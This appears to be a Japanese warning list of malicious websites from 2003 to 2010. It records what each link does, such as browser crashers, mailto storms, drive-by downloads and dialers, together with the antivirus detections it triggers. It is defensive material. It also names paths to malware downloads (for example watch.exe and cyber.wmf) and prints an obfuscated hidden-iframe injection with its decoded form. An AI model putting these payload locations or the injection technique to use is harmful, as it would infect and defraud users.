| 通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
| [2005/09/21] | 踏むと こんな感じ のサイト。バスター無反応だが、以下のアンチウィルスソフトで反応。
ウィルス名:IRC-Worm.HTML.Generic [ アンチドート ] ウィルス名:VBS.LoveLetter.D [ ClamWin ] ウィルスコードらしきものが書かれているので、それに反応しているのかも知れないが、詳細は不明。 |
| [2008/09/29] | こんな感じ のページだが、ウィルス名:POSSIBLE_HIFRM を検出。
真っ白なページの上のほうに以下の文字列がある。 「There are currently no advertisers on our site that accept traffic from , please try again at a later date!」 右クリックしてソースを調べても上の文字列があるだけだが、このサイトは現れない別のソースがある。 そのソースを調べてみると、IFRAMEタグを使って3つのURLを呼び出しているのだが、確認するたびに呼び出すURLが違う。 以下がその呼び出すURLと思われ、このうち、3つのURLを呼び出す。いずれもバスター無反応の真っ白なページである。 //l21.lookfeeds.net/sea.php //searchta.net/sea.php //p119.searchta.net/sea.php //p175.searchta.net/sea.php //p177.searchta.net/sea.php //pp127.searchta.net/sea.php //pp165.searchta.net/sea.php //pp172.searchta.net/sea.php |
| [2008/11/15] | ファイルサイズ:3.00MB 。ウィルス名:ADW_SAVENOW |
| [2004/10/10] | ウィンドウが出てきて動き回る。Alt+F4 で脱出。 |
| [2006/02/09] | 踏むと こんな感じ のサイトだが、ウィルス名:VBS_LOVELETTER-O を検出。
しかし、ソースに対するバスターの誤反応と思われる。 |
| [2004/11/04] | ウィルス名:HTML_REDIR.A |
| [2008/08/17] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_DLOADR.GH |
| [2005/01/13] | ウィルス名:VBS_REDLOF.A |
| [2003/09/28] | 3、2、1 とカウントした後、ブラクラ。 |
| [2004/08/05] | 無限JavaScript。mailtoストーム。 |
| [2009/04/04] | こんな感じ のサイトだが、ウィルス名:HTML_IFRAME.AH を検出。
ソースチェッカーでは「JS/Psyme.QMを発見!」と診断される。 |
| [2006/05/30] | mailtoストーム。 |
| [2006/05/30] | 他の方の結果は以下の「」内。
「mailtoストームがあるそうですが、僕の環境ではメモリを食いつぶしてPCの動作が重くなるだけでした。あとポップアップで宣伝サイトが開きます。」 |
| [2004/03/30] | 「由里亜の部屋」という個人のサイト。「クイズ」がブラクラになっている。 |
| [2004/06/21] | 問題1「龍神を呼び出す言葉は? 」というクイズ。いずれかのボタンを押せばそのあと、telネットのプログラムが開く。 |
| [2004/06/23] | このページ自体には問題ないがボタンを押した先のURL→ //page.freett.com/yurink/zan.htm で「残念!」と表示された直後にMailtoストームが発動。
4つあるボタンを全部押して見るがどれも同じ結果。 |
| [2004/06/23] | 踏んだ場合、クイズ内容がランダムに変わる。 |
| [2004/06/26] | 上記URL参照。メールフォームが無限に発動するブラクラだがPCによっては発動無し。 |
| [2007/02/25] | ウィルス名:JS_EXCEPTION.GEN |
| [2008/12/20] | こんな感じ のサイト。ページ内でエラーを起こしている。
バスター無反応だが、他社製ウィルス駆除ソフトによっては反応があると思われる。 |
| [2009/05/19] | 以下のURLに飛び、悪質なスパイウェアを強引にDLしてくる有害サイトを表示する。その途中でウィルス名:JS_DLOADER.UGD を検出。
//miniscan4.info/26/?uid=143 |
| [2009/01/08] | 2重拡張子。ウィルス名:TROJ_DLOAD.DU |
| [2008/10/22] | 真っ白なページだが、繰り返しリロードし、そのたびにウィルス名:HTML_IFRAME.AME を検出する。
IFRAMEタグで //www.k5dionne.com/ffxmmi を呼び出しているのが原因。 |
| [2008/08/14] | こんな感じ のサイト。バスターが危険なWebサイトとして警告する。
見ると、延々と何かをリロードして読み込んでいる症状が窺える。 |
| [2008/08/14] | 他の方の結果は以下の「」内。
「踏んでみると Kaspersky がウィルス「Trojan-Downloader.JS.Agent.cid」を検出。」 |
| [2008/08/15] | 「Apogee PhotoのThe Sensuous Lineというサイトで、英文の説明を読むと人の芸術的なヌードを扱っていたらしいです。
画像のリンクが切れて、どこにもリンクがないような状態になっています。Avast 無反応。 しかし「dfsqras.jpg」でググルとウイルスかワームがダウンロードされていたという結果も出ていますので、一応回避推奨です。」 |
| [2008/08/15] | 「dfsqras.jpg はファイル名でなくディレクトリ名のようです。当方のVB反応しました。ウィルス名:JS_DLOADER.XSV との事です。」 |
| [2008/12/13] | ウィルス名:TROJ_EXCHANGE.AK |
| [2009/01/08] | ウィルス名:TSPY_BANCOS.CZZ |
| [2008/10/12] | こんな感じ のサイトだが、ウィルス名:EXPL_EXECOD.A を検出。
このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。 ソースを見ると、IFRAMEタグで //www.gorsara.com/ma/ を呼び出しているのが原因。 |
| [2008/10/12] | 他の型の結果は以下の「」内。
「Kaspersky がトロイの木馬を検知しました。」 「HTML:IEslice-C [Trj] を検出しました。」 |
| [2008/10/14] | 「Trojan-Downloader.HTML.IFrame.dv を Kaspersky で検出。」 |
| [2005/10/03] | このURLを踏んだ場合の挙動は以下の2つのURLの挙動とほぼ同一なので、以下のURL解説を参照のこと。
//youngshow.repon.info/SECRET-CONT //youngshow.repon.info/SECRET-CONT2 |
| [2005/12/04] | 踏むと海外アダルトサイトだが、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E+JAVA_BYTEVER.S を検出。
別窓がいくつかある。別窓は確認するたびにランダムに色々なアダルトサイトを表示する模様。 元の//paradise.repon.info/DARKVIDEO/では、スクリプトエラーがあるようで、これ を表示する。 「このページのスクリプトを実行し続けますか?」と出るが、「はい」と「いいえ」のどちらを選んでも何も無かった。 「このページのスクリプトを実行し続けますか?」の「このページ」とは以下のURLと思われる。 //highconvert.com/dt/hta/hta-e.html 元の //paradise.repon.info/DARKVIDEO/ を閉じると色々なアダルトサイトを何枚か表示。 |
| [2005/10/09] | ウィルス名:HTML_MHTREDIR.AP+VBS_PSYME.AN+JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E |
| [2005/12/04] | 踏むと海外アダルトサイトだが、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E+JAVA_BYTEVER.S を検出。
別窓がいくつかある。別窓は確認するたびにランダムに色々なアダルトサイトを表示する模様。 元の//paradise.repon.info/LS-DREAMS/では、スクリプトエラーがあるようで、これ を表示する。 「このページのスクリプトを実行し続けますか?」と出るが、「はい」と「いいえ」のどちらを選んでも何も無かった。 「このページのスクリプトを実行し続けますか?」の「このページ」とは以下のURLと思われる。 //highconvert.com/dt/hta/hta-e.html 元の //paradise.repon.info/LS-DREAMS/ を閉じると色々なアダルトサイトを何枚か表示。 |
| [2005/12/29] | 海外アダルトサイト。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E+JAVA_BYTEVER.S |
| [2005/10/09] | ウィルス名:HTML_MHTREDIR.AP+VBS_PSYME.AN+JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E |
| [2009/12/20] | ファイルサイズ:80.0 KB 。ウィルス名:TSPY_ZBOT.SMY |
| [2006/01/20] | //www.paris-hilton-movies.com/cgi-bin/tm3/m に飛んで、海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php 閉じると 「ALFASEARCH」という検索サイトと、ブラクラ並に色々な海外アダルトサイトを開く。 |
| [2009/03/21] | ブラクラの一種と思われる。延々とリロードを繰り返している。
ソースを見ると、IFRAMEタグを相当数使って以下のURLを呼び出している。 //www.amazon.co.jp/b?ie=UTF8&node=15754471&httpblogs0395-22&linkCode=ure スペックの低いPCならば、フリーズするものと思われる。 |
| [2005/04/29] | ウィルス名:JS_PSYME.AF。//www.googkle.com/ と同じ現象が起きる。詳細は //www.gookle.com/ のURL解説を参照。 |
| [2008/08/17] | 真っ白なページだが、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.DP を検出。
また、ActiveX の実行も要求してくる。 |
| [2008/08/17] | こんな感じ のページだが、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.DP を検出。
さらに以下のファイルをDLしろ、と言ってくる。 //pauloverseasproperties.com/watch.exe ← ウィルス名:TSC_GENCLEAN+TROJ_DLOAD.CW |
| [2008/08/17] | ウィルス名:TSC_GENCLEAN+TROJ_DLOAD.CW |
| [2007/01/06] | パソコン販売の会社のページらしいが、 Kaspersky で Trojan-Downloader.VBS.Small.bo を検出するらしい。バスターは無反応。
ソースを見ると、ソースの下のほうにIFRAMEタグで下のURLを呼び出しているが、詳細は不明。 //0192449.ee28.cn/htm/ |
| [2007/02/08] | バスター反応。ウィルス名:VBS_SMALL.DOO |
| [2004/05/31] | 不明なexeをDLしてこようとする。環境によりスパイウェアサイトに飛ぶ。 |
| [2008/11/19] | ウィルス名:ADW_CRAMTOOLBA.B |
| [2008/12/13] | ウィルス名:TROJ_KRYPTIK.EV |
| [2008/08/17] | zipファイルの中に「Extrato-87612.exe」が入っているが、ウィルス名:TROJ_BANLOAD.EKG を検出。 |
| [2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 |
| [2008/12/13] | ウィルス名:TROJ_DLOAD.FE |
| [2005/11/28] | ウィルス名:TROJ_CRACKNT.A |
| [2005/11/28] | ウィルス名:TROJ_MS03.051 |
| [2005/11/28] | ウィルス名:TROJ_MESSER.D |
| [2005/11/28] | ウィルス名:BKDR_REMSERV.A |
| [2005/11/28] | ウィルス名:BKDR_WNT.ROOTKIT |
| [2005/11/28] | ウィルス名:HKTL_HIDEPROC.A |
| [2005/11/28] | ウィルス名:BKDR_EGGDROP.A+BKDR_EGGDROP.D+BKDR_EGDROPA.15+BKDR_EGDROPA.17 |
| [2005/11/28] | ウィルス名:BKDR_TCMD.10 |
| [2005/11/28] | ウィルス名:TROJ_PASSCU.A |
| [2005/11/28] | ウィルス名:HKTL_VENOM.A |
| [2005/11/28] | ウィルス名:TROJ_AGENT.FJ |
| [2005/11/28] | ウィルス名:TROJ_TSYSCMD.A |
| [2005/11/28] | ウィルス名:TROJ_ROLARK.A+TROJ_WEBDAV.B |
| [2005/11/28] | ウィルス名:TROJ_SCAN.A |
| [2008/12/13] | ウィルス名:TROJ_EXCHANGE.AJ |
| [2005/06/03] | 「tess1.exe」という名のファイルが落ちてくる。バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Drop.Small.UT.2 Avast → Win32:Trojano-981 AVG Antivirus → Dropper.Small.15.BU BitDefender → Adware.Globosearch.A ClamAV → Trojan.Small-74 Dr.Web → Trojan.MulDrop.1984 Fortinet → W32/Small.UT-tr Kaspersky Anti-Virus → Trojan-Dropper.Win32.Small.ut mks_vir → Trojan.Dropper.Small.Ut NOD32 → probably unknown NewHeur_PE Norman Virus Control → W32/Malware VBA32 → Trojan-Dropper.Win32.Small.ut |
| [2005/06/03] | 「mic.anr」という名のファイルが落ちてくる。バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Exploit.MS05-002.Ani.A BitDefender → Exploit.Win32.MS05-002.Gen ClamAV → Exploit.W32.MS05-002 Dr.Web → Exploit.ANIFile Kaspersky Anti-Virus → Trojan-Downloader.Win32.Ani.c VBA32 → Trojan-Downloader.Win32.Ani.c この「mic.anr」ファイルは//perou-voyage.com/0000/tess1.exeを落としてくる。このURL解説も参照。 |
| [2005/08/16] | ウィルス名:TROJ_ANICMOO.P |
| [2009/03/21] | ウィルス名:TROJ_GENERIC.DIT |
| [2004/04/06] | スパイウェア。ページが勝手に書き換えられる。 |
| [2008/10/02] | ウィルス名:MAL_ZAP+BKDR_ZAPCHAST.AX+BKDR_MIRCHACK.CE+TROJ_GENERIC |
| [2004/07/29] | //213.159.117.133/ ←CoolWebSearch に飛ぶ。 |
| [2004/09/10] | //213.159.117.133/dl/ms.php に飛ぶ。 |
| [2004/11/16] | ウィルス名:JAVA_BYTEVER.A 。SPYBOT反応:XXXToolbar |
| [2004/02/29] | いきなりダイヤルアップ接続のソフトをDLさせられる。 |
| [2004/06/03] | 「99950684.exe」というアダルトコンテンツ閲覧用のdialupツール実行ファイルがDLされる。 |
| [2008/11/15] | DL+解凍すると、いくつかのファイルが現れるが、その中の「diybar2.dll」ファイルからウィルス名:ADW_DIYBAR.A を検出。 |
| [2005/01/11] | 海外サイトに飛ぶが飛び先がランダムで3回目に確認した時、飛び先でVB2005が反応。 |
| [2005/01/11] | 私が10回ほど確認した結果は以下。 回目、飛び先、結果 の順。飛び先はまだ他にも有りそう。
1回目。//cosmetic-surgery.typicalsearch.com/ ←閉じるとセキュリティ警告あり。 2回目。//debt-consolidation.typicalsearch.com/ ←閉じるとウィルス検出。 検出されたウィルス名:JS_OBJDATA.A+HTML_REDIR.A+JAVA_BYTEVER.A。 3回目。//bakgrundsbilder.typicalsearch.com/ ←何もなし。 4回目。//home-loans.typicalsearch.com/ ←閉じるとセキュリティ警告あり。 5回目。//frontline-plus.typicalsearch.com/ ←閉じるとウィルス検出。 検出されたウィルス名:JS_OBJDATA.A+HTML_REDIR.A+JAVA_BYTEVER.A。 6回目。//strivectin.typicalsearch.com/ ←何もなし。 7回目。//equifax.typicalsearch.com/ ←何もなし。 8回目。//debt-consolidation.typicalsearch.com/ ←何もなし。 9回目。//ibs.typicalsearch.com/ ←何もなし。 10回目。//annuities.typicalsearch.com/ ←何もなし。 |
| [2006/02/09] | 「pic122.exe」という名のファイルが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/Agent.BCM ArcaVir → Worm.Small.I AVG → Worm/Generic.HQ BitDefender → Win32.Worm.Small.F ClamAV → Worm.Mytob.Gen-6 Dr.Web → BackDoor.Oscar Fortinet → W32/Generic.I!net Kaspersky → Net-Worm.Win32.Small.i NOD32 → probably unknown NewHeur_PE Norman Virus Control → Sandbox: W32/Malware VBA32 → Net-Worm.Win32.Small.i |
| [2006/02/09] | 他の方の結果では「ワームを確認しました、有害です。後、怪しげなexeをインストールしようとしてきますね。」 |
| [2008/12/13] | ウィルス名:TROJ_NUWAR.CYA |
| [2008/10/12] | こんな感じ のページだが、ウィルス名:JS_AGENT.ARUY を検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 ソースを見ると、IFRAMEタグで //www.wrmfws.cn/b5.htm を呼び出しているのが原因。 |
| [2004/06/07] | 洋エロサイトだが環境により、スパイウェアを仕込まれる可能性あり。 |
| [2004/06/18] | ウィルス名:Dropper.Inor。 最新パッチを当てていないと、このサイトからファイルをDLされ、「output.exe」として保存され、実行される。 |
| [2004/06/20] | ダイヤルアップ接続ソフトをDLさせられる。クリックの仕方によっては無限アラート状態に陥る。 |
| [2009/02/12] | 携帯電話からアクセスすると何かあるらしい。PCでは真っ黒な画面を表示するだけであった。携帯電話からは未確認。
以下の他の方の結果を参照のこと。 「携帯用ブラクラに飛ばされます。真っ暗な画面で、バイブがいきなり動き出しますが、その後挙動不審になることはないようです。PCでは真っ暗な画面が表示されるだけでした。」 |
| [2009/02/23] | 「飛ばされた先のURLを見ると、拡張子は swf ですが、PCで見れば何の動作もありませんでした。
しかし、携帯でアクセスすると画面が動き出す携帯用ブラクラサイトでした。」 |
| [2005/07/13] | 踏んで少し経ってウィルス名:HTML_MHTREDIR.AP を検出。別窓は //girlsteens.net/ を表示。
これ がウィンドウ画面右上から左上まで移動する。 「Download RAZOR SPYWARE」がリンクになっていて、踏むと以下の@のURLに飛ぶ。 @ //razespyware.net/?t=2&affid=1714 ← 「AZESPYWARE」なるものを入れろ、と催促される。 また、//pictures.ecstazy.info/ はIFRAMEタグで、以下の3つのURLを呼び出す。
|
| [2005/03/06] | ウィルス名:ADW_RBLAST.E |
| [2006/05/02] | こんな感じ のサイト。「cyber.wmf」なるファイルをDLしろ、と言ってきてウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN を検出。
「cyber.wmf」の発信元は cyber-search.biz である。 |
| [2006/05/22] | こんな感じ のサイトだが、ウィルス名:ADW_RENOS.AB+TROJ_ANICMOO.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.A-1+JAVA_BYTEVER.K を検出。 |
| [2006/05/22] | 他の方の結果では「ノートンが侵入を検知。何らかの情報を詐取しようとしていると思われ。」 |
| [2005/08/17] | 海外アダルトサイト。バスター無反応だが、どこかで危険URL指定らしい。
リンク先の中にウィルス憑きURLがあるので注意。 |
| [2006/01/20] | 踏むと こんな感じ のサイトだが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php |
| [2004/09/21] | ブラクラ:「You are an idiot ! 」 |
| [2005/01/26] | ノートンがウィルス名:Trojan.Offiz を検出するらしい。 |
| [2005/05/14] | 再確認。「You are an idiot ! 」だが、ウィンドウ増殖は確認できなかった。 |
| [2005/03/24] | ウィルス名:HTML_REDIR.A+JS_OBJDATA.A+JAVA_BYTEVER.A |
| [2005/03/07] | ウィルス名:HTML_REDIR.A |
| [2004/08/15] | ウィルス名:HTML_REDIR.A |
| [2004/09/15] | 「2DimensionOfExploitsEnc.hta」というファイルが落ちてくる。中身はhtmlファイルだがexeを実行させられる。
このexeはウィルス名:TROJ_SMALL.CK |
| [2004/11/05] | ウィルス名:HTML_REDIR.A |
| [2005/03/15] | ウィルス名:TROJ_SMALL.KR。/acc**/ の ** の数字は110も確認。他の数字も相当数あり、調査中。 |
| [2004/08/13] | ウィルス名:JAVA_BYTEVER.A |
| [2004/08/13] | //pizdato.biz/acc59/new/classload.jar を実行される。
/acc**/ の数字は調べてみると1から 114 まであり、 それぞれ//pizdato.biz/acc[ 1 から 114 ]/new/classload.jarを実行される。 全てウィルス名:JAVA_BYTEVER.Aなので注意。 |
| [2006/08/02] | 2006/07/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、それは以下。 「ウイルスパターンファイル「3.631.00」にて、ウィルス名:CHM_STARTPAG.CS として検出するよう対応」とのこと。 実際にファイルをDLしてウィルス名:CHM_STARTPAG.CS を検出することを確認。 |
| [2005/06/26] | 「files.chm」というコンパイル済みHTMLヘルプファイルが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 ArcaVir → Trojan.Dropper.Small.Ig BitDefender → Trojan.Dropper.Small.IG, Exploit.Html.Codebase.Exec.Gen ClamAV → Trojan.Downloader.Small-4 Fortinet → HTML/CodeBaseExec Kaspersky Anti-Virus → Trojan-Dropper.Win32.Small.ig, Exploit.HTML.CodeBaseExec NOD32 → Win32/Small.R, Win32/TrojanDownloader.Small.AHZ VBA32 → Win32.TrojanDropper.Small, Exploit.CodeBase.gen |
| [2006/11/05] | 再確認。「files.chm」のコンパイル済みHTMLヘルプファイルにウィルス名:CHM_STARTPAG.CS として反応する。 |
| [2008/12/14] | ウィルス名:PAK_GENERIC.001 |
| [2009/02/02] | 真っ白なページだが、ウィルス名:JS_DLOAD.MD+EXPL_ANICMOO.GEN+EXPL_EXECOD.A を検出。
そのうちに「about:blank」に変わる。 |
| [2009/02/02] | ウィルス名:EXPL_ANICMOO.GEN |
| [2009/02/02] | 真っ白なページだが、ウィルス名:JS_DLOAD.MD+EXPL_ANICMOO.GEN+EXPL_EXECOD.A を検出。
そのうちに「about:blank」に変わる。 |
| [2009/02/02] | ウィルス名:TSPY_QQPASS.DHA |
| [2009/02/02] | 真っ白なページだが、ウィルス名:JS_DLOAD.MD を検出。 |
| [2009/02/02] | 真っ白なページだが、ウィルス名:EXPL_EXECOD.A を検出。 |
| [2005/10/09] | 「pfree.exe」なる名のアプリケーションが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/Drop.HSP.a.1.A ArcaVir → Trojan.Killfiles.U F-Prot Antivirus → dropper for W32/Trojan.YX Fortinet → Adware/HSP Kaspersky Anti-Virus → Trojan-Clicker.Win32.HSP.a Norman Virus Control → W32/Agent.GBJ |
| [2005/10/13] | 再確認。「pfree.exe」というアプリケーションをDLできる。DLするとバスターがウィルス名:TROJ_CLICKER.CW を検出。
しかし、このURLは私が昨日確認したら繋がらなかった。 |
| [2005/12/07] | 再確認。踏むと「pfree.exe」というアプリケーションが落ちてくる。DLした途端、バスターがウィルス名:TROJ_CLICKER.CW を検出。
Kaspersky Anti-Virus ではウィルス名:Trojan-Clicker.Win32.HSP.a を検出するらしい。 |
| [2006/01/05] | 踏むと「pfree.exe」なるものをDLしろ、と言ってくる。DLした途端、ウィルス名:TROJ_CLICKER.CW を検出。 |
| [2006/01/21] | BitDefenderでは Trojan.Clicker.Hsp.A を検出するらしい。 |
| [2006/02/05] | 他の方の結果では「Kaspersky 反応あり。Trojan-Clicker.Win32.HSP.a 検出。」 |
| [2007/01/27] | ウィルス名:TROJ_ZLOB.BWB |
| [2007/03/20] | 2007/03/19 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ZLOB.CVK として検出するよう対応、とのこと。 実際に 2007/03/19 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_ZLOB.CVK を検出することを確認。 2007/03/19 から今日まではファイルは置き換えられていないと推測される。 |
| [2010/02/06] | ファイルサイズ:76.0 KB 。不正なファイルと思われる。 |
| [2008/09/28] | ウィルス名:DIAL_CBHQ |
| [2008/09/29] | 真っ白なページだが、以下のファイルを実行しようとしている。
//www.ppexe.com/csrss/rondll32.exe |
| [2005/11/27] | 無限ウィンドウオープン。 |
| [2008/11/22] | 偽装ウィルス駆除ソフトのページに飛ぶ。 |
| [2008/09/30] | 2重拡張子。ウィルス名:TROJ_AGENT.ALWK |
| [2006/08/24] | ウィルス名:BKDR_Generic |
| [2006/12/13] | 2006/11/14 にトレンドマイクロ社に中身の「ms7531.exe」ファイルを提出。
今日までに結果の連絡は無いが、ウィルス名:BKDR_Generic として検出対応してくれた模様。 2006/11/14 にDLしたファイルと今日改めてDLしたファイルからウィルス名:BKDR_Generic を検出。 |
| [2006/10/30] | 2006/10/18 にトレンドマイクロ社にDL+解凍して現れた「nap32.exe」ファイルを提出。
2006/10/24 にその結果の連絡があり、ウィルス名:DIAL_HIJACKER.B として検出するよう対応、とのこと。 実際に 2006/10/18 にDLしたファイルからウィルス名:DIAL_HIJACKER.B を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_HIJACKER.B を検出することを確認。 |
| [2008/06/30] | ウィルス名:TSC_GENCLEAN+TROJ_BANLOAD.MCZ |
| [2006/11/09] | //eroskop.pl/index1.html に飛ぶので、そちらのURL List解説を参照。 |
| [2006/11/09] | 2006/11/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_EROSKOP.A として検出するよう対応、とのこと。 実際に 2006/11/05 にDLしたファイルからウィルス名:DIAL_EROSKOP.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_EROSKOP.A を検出することを確認。 |
| [2009/05/09] | ファイルサイズ:64.5 KB 。ウィルス名:MAL_BANLD-3 |
| [2009/05/09] | 実際には「FlashPlayer.zip」ファイルが落ちてくる。ファイルサイズ:9.70 KB 。
DL+解凍すると「Inicio.class」ファイルが現れるが、ウィルス名:TROJ_GENERIC.DIT を検出。 |
| [2009/05/09] | ファイルサイズ:64.5 KB 。ウィルス名:MAL_BANLD-3 |
| [2009/05/09] | ファイルサイズ:5.03 MB 。ウィルス名:TROJ_GENERIC.DIT |
| [2009/05/09] | ファイルサイズ:3.21 MB 。ウィルス名:TSPY_BANCOS.GEN |
| [2009/05/09] | ファイルサイズ:64.5 KB 。ウィルス名:MAL_BANLD-3 |
| [2007/05/12] | 海外アダルトサイトだが、バスター2007が危険なWebサイトとして警告する。 |
| [2007/05/12] | 他の方の結果は以下。
「出会い系のような海外サイトに飛んだ後、「Trojan-Downloader.VBS.Agent.p」検出。そのサイトを閉じると詐欺ソフトサイトが立ちあがります。」 |
| [2009/03/23] | ウィルス名:TROJ_FRAUDLOA.RN を検出。しかし、今日現在では 404 になっている。 |
| [2006/02/09] | ウィルス名:TROJ_CLICKER.HG [ ウィルスバスター ]
ウィルス名:Trojan-PSW.Win32.Kapod.n [ Kaspersky ] |
| [2006/02/14] | 以下は2chでのレスを掲載。
「wmvコーティング、これ使ってみ」って言われたから、開いたら実行ってZIP?ファイルが出てきたんです。」 初心者ですし、実行したら使えるのかな?と思って実行したら・・・ アダルトサイトにいきなり入会したことになって、今、請求内容が5分に一回立ち上がるんですorz これ が内容です・・」 |
| [2008/10/14] | こんな感じ のサイト。バスター無反応だが、Kaspersky で not-a-virus:AdTool.Win32.MyWebSearch.cw を検出するらしい。
このサイトは以下のファイルを落としてくる。 //ak.exe.imgfarm.com/images/nocache/funwebproducts/2.3.50.22/PopularScreensaversSetup2.3.50.22.ZRfox000.exe |
| [2005/03/29] | 何回か踏んで見ると、このURLで表示される画面が違う場合が多くある。
中にはウィルス名:JS_DRAGDROP.GENを検出したり、ウィルス名:JAVA_BYTEVER.A を検出したりするものもある。 |
| [2008/06/30] | ウィルス名:TSC_GENCLEAN+Mal_Banker |
| [2008/09/30] | こんな感じ のサイト。5秒後に「videoPorn218hdy.exe」ファイルが落ちてくるが、ウィルス名:TROJ_KRYPTIK.EV を検出。 |
| [2008/09/30] | ウィルス名:TROJ_KRYPTIK.EV |
| [2005/09/21] | 踏むと5秒くらいしてからブラクラ並に色々なアダルトサイトが開いていく。
その過程でウィルス名:JS_DLOADER.I+JAVA_BYTEVER.A を検出。特に JS_DLOADER.I は多めに検出。 |
| [2005/10/01] | 他の方の結果は以下。
「有害サイトがブラクラレベルで開きました。バスター反応あり。」 「洋エロサイト。詳細:エロサイトがどんどん新規に開きます。ページエラーが多く固まりかけます。恐らくスパイウェア満載です。」 |
| [2005/10/01] | 踏むと海外アダルト系のリンク集のようなサイト。
再確認。何回か確認してみるとブラクラ並に色々なアダルトサイトが開く。その過程でウィルス名:JAVA_BYTEVER.A を検出。 但し、ブラクラ並に開いても中々ウィルスを検出しない時もあった。また、ブラクラ並に開かない時もあった。 |
| [2006/02/04] | 他の方の結果では「There is no website configured at this address. と表示される洋ページでした。ページが消えているのかもです。危険URLなので踏まない方がいいでしょう。」 |
| [2005/08/22] | 海外アダルトサイト。ウィルス名:JAVA_BYTEVER.A
String.fromCharCode(60,105,102,114,97,109,101,32,119,105,100,116, 104,61,50,32,104,101,105,103,104,116,61,50,32,115,116,121,108,101, 61,118,105,115,105,98,105,108,105,116,121,58,104,105,100,100,101, 110,32,115,114,99,61,39,104,116,116,112,58,47,47,56,53,46,50,53,53, 46,49,49,51,46,49,56,47,105,110,99,47,110,97,110,51,46,104,116,109, 108,39,62,60,47,105,102,114,97,109,101,62)); ↑ ソースの中にString.fromCharCodeで暗号化された部分がある。これを復号化すると下のようになる。 ↓ <iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.18/inc/nan3.html'></iframe> ↑ //85.255.113.18/inc/nan3.htmlに行ってみたが、無害だと思われる。 |
| [2005/08/22] | ウィルス名:TROJ_DLOADER.XH+JAVA_BYTEVER.A [ ウィルスバスター ]
ウィルス名:Exploit.HTML.MHTRedir-6 [ ClamWin ] |
| [2006/01/20] | 海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php 閉じると 「ALFASEARCH」という検索サイトと、ランダムで海外アダルトサイトを開く。 |
| [2006/01/20] | 海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php |
| [2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 |
| [2005/02/06] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C。ブラクラ並にエロサイトが開く。 |
| [2008/06/29] | ウィルス名:TSC_GENCLEAN+EXPL_ANICMOO.GEN+EXPL_WMF.GEN
海外アダルトサイトだが、怪しげなファイルのDLを促してきたりする。 |
| [2006/01/20] | 海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
